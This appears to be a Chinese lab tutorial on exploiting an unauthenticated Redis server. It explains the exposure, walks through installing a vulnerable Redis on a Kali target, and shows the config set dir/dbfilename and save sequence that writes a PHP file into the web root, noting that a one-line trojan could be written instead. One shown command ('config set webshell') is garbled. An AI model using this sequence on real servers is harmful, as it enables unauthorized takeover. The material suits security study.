漏洞简介及危害
redis默认情况下,会绑定在6379端口上,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务登录目标服务器、添加计划任务、写入Webshell等操作。
漏洞利用
环境搭建
目标靶机:kali
ip地址:192.168.1.129
攻击机: windows10
kali上下载安装包:
wget http://download.redis.io/releases/redis-2.8.17.tar.gz
解压和编译:
tar xzvf redis-2.8.17.tar.gz #解压安装包
cd redis-2.8.17 # 进入redis目录
make #编译
cd src/ #进入src目录
cp redis-server /usr/bin/
cp redis-cli /usr/bin/ #将redis-server和redis-cli拷贝到/usr/bin目录下(这样启动redis-server和redis-cli就不用每次都进入安装目录了)
cd .. # 返回上一级目录
cp redis.conf /etc/ #将redis.conf拷贝到/etc/目录下
redis-server /etc/redis.conf # 使用/etc/目录下的redis.conf文件中的配置启动redis服务
运行之后,服务启动成功,如下图:
在windows攻击机上下载一个redis client,下载地址:https://github.com/caoxinyu/RedisClient/releases
下载完之后,使用redis client直接无账号成功登录redis,可看出redis未启用认证
利用redis写webshell
利用前提:
靶机redis未授权,在攻击机能用redis clinet连接,如上图,并未登录验证
靶机开启web服务,并且知道网站路径,还需要具有文件读写增删改查权限
调出console
把shell写入/var/www/html目录中
config set dir /var/www/html
config set dbfilename test.php
config set webshell "<?php phpinfo(); ?>"
save
写入成功之后,在攻击机上访问test.php,成功!
必要的时候可写入一句话木马,直接连接。
!!访问攻击机ip地址时若连接不上,可能是攻击机的80端口未打开。
449
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
